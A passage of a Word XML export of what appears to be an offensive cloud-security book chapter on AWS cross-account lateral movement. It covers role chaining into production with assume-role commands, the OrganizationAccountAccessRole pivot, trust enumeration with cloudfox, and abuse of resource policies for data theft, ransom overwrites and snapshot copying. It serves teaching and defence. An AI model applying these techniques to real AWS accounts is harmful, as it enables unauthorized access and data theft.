    <w:p w14:paraId="5A3783CB"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{"Credentials":{"AccessKeyId":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>","SecretAccessKey":"...","SessionToken":"...","Expiration":"..."}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7E461"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 Step 3: chain into prod via the staging role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75912AB6"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AWS_ACCESS_KEY_ID=ASIA1 AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=... \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D208146"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 xml:space="preserve">  aws sts assume-role --role-arn arn:aws:iam::999988887777:role/prod-deploy --role-session-name pipe2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C4FB1"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{"Credentials":{"AccessKeyId":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>","Expiration":"2026-04-20T15:12:00Z"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A1D68" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># ASIA2 is valid for at most 1 hour — chained sessions do not honor longer MaxDurationSeconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E26EC07" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2  The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pathway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3639D32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AWS Organizations, when it creates member accounts via the API, provisions a role named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in every new member account. The role has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AdministratorAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, and its trust policy allows the management (master) account to assume it. This is documented, intentional, and the canonical cross-account-management primitive. It is also the most valuable cross-account pivot in the AWS ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366A73B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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From the management account, an operator can assume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into any member account and immediately has administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A6C61" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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From a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>non-management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, the role is not directly assumable — but if you compromise any identity that has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:iam::*:role/OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, you have the same reach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CBF4D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Some organizations rename the role (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWSControlTowerExecution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is the Control Tower-managed equivalent) or lock it down. An attacker cannot assume what is not trusted to them; but the existence of these roles is always worth probing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24939C67"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Management accoun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111111111111 (payer</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user/devops-admi</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Compromised via Chapter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6</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(leaked access key, Okta phish</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Has sts:AssumeRole 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arn:aws:iam::*:role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OrganizationAccountAccessRol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Member — prod-financ</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22222222222</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2</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OrganizationAccountAccessRol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Member — prod-en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>g</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33333333333</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OrganizationAccountAccessRol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Member — staging-dat</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44444444444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4</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OrganizationAccountAccessRol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Member — prod-billin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>g</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55555555555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5</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OrganizationAccountAccessRol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One compromised identity in the management account yields administrator access to every member. Blast radius = the entire organization</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Role-chain graph across three accounts. The organization-provisioned role is the highest-leverage cross-account primitive and should be monitored as a crown-jewel asset</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4DE3F46F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3  Cross-account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25181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Outside the Organizations-provisioned role, cross-account trust is established when account A's role has account B in its trust policy. The operator's job is to enumerate every such trust in every compromised account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53194AE5"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cloudfox aws --profile target role-trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B23AA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># CloudFox groups trusts by: cross-account (accounts you don't own), internal, service-linked, federated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F73D686"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[cross-account] role/audit-vendor        trusts 464622532012 (Datadog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F99B23"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[cross-account] role/security-scan       trusts 123456789012 (Wiz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C159FE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cross-account] role/billing-exporter    trusts 098765432109 (Anvil Finance SaaS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA63BAB"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[internal]     role/org-admin-xacct      trusts 111111111111 (mgmt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BD327" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[internal]     role/prod-read-only       trusts 111111111111 (mgmt) + 999988887777 (staging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F07CAD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.4  Resource-based policy cross-account abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBB5E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Not every cross-account reach goes through a role. Resource policies are the other half of the story. Patterns that come up repeatedly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEAD45" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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S3 cross-account bucket read.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A bucket policy that includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal: {"AWS":"arn:aws:iam::&lt;other-acct&gt;:root"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows any principal in the other account with S3 permissions to read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A130D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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KMS cross-account decrypt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A KMS key policy that allows an external account to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> lets you decrypt all data encrypted under the key, regardless of where the ciphertext lives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F98B2E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Lambda cross-account invoke.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can add an external account as allowed caller; an over-permissive Lambda with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-equivalent downstream actions becomes an attack proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D12B1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Secrets Manager cross-account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A resource policy that grants an external account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secretsmanager:GetSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> lets them read the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2E5DE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ECR cross-account pull.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pull production images, analyze for secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12596020" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RDS cross-account snapshot share.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A snapshot shared with an external account can be copied and restored in the attacker's account, yielding a full database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C96360" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Resource-policy-crossable services and their attack angles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bucket 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read data, ransom-overwrite (SSE-C</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KMS key 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decrypt data encrypted elsewher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 resource polic</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cross-acct invoke, SSRF prox</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SNS / SQ</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msg injection, subscrib</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Secrets Manage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GetSecretValue → auth bypas</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ECR repositor</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pull + analyze prod image</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Glue Data Catalo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>g</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schema, table names, partition</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API Gatewa</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cross-acct invok</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RDS snapshot shar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copy + restore in attacker acc</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EBS snapshot shar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mount and gre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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AMI shar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launch, extract userdata + dis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>k</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RAM shar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VPC, subnet, TG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>W</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Resource-policy cross-account trust surface. Each of these services admits principal specification in its resource policy and is therefore a distinct cross-account reach</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0DF612C0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.5  AWS RAM — shared resources across accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439FE0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AWS Resource Access Manager (RAM) shares specific resources (subnets, transit gateways, license configurations, Route53 Resolver rules, Glue Data Catalog databases, …) with other accounts without invoking IAM. A RAM share that grants a subnet to another account allows that account to launch EC2 instances in that subnet — effectively giving the destination account network-plane presence inside the source account's VPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD442A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For an attacker that has compromised a "small" account, a RAM subnet share into a larger production VPC is a lateral-movement primitive that never crosses IAM at all. Detection is comparatively weak because the share targets are often owned by different principals than the attacker's IAM, and CloudTrail events come from the source account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E5CF4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.6  The confused-deputy landscape after 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10FDB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In March 2022 AWS announced that when a third-party service performs an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on behalf of a customer, AWS enforces </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>passing. The practical effect: a third-party vendor can no longer "forget" the ExternalId; if the customer's trust policy requires it, it must be present. The change closed a confused-deputy class, but three operational realities keep the category relevant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E33AAA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Trust policies predating the change may never have included the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition. The enforcement behavior means nothing if the condition is not there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E6107" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Cross-account trusts that are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
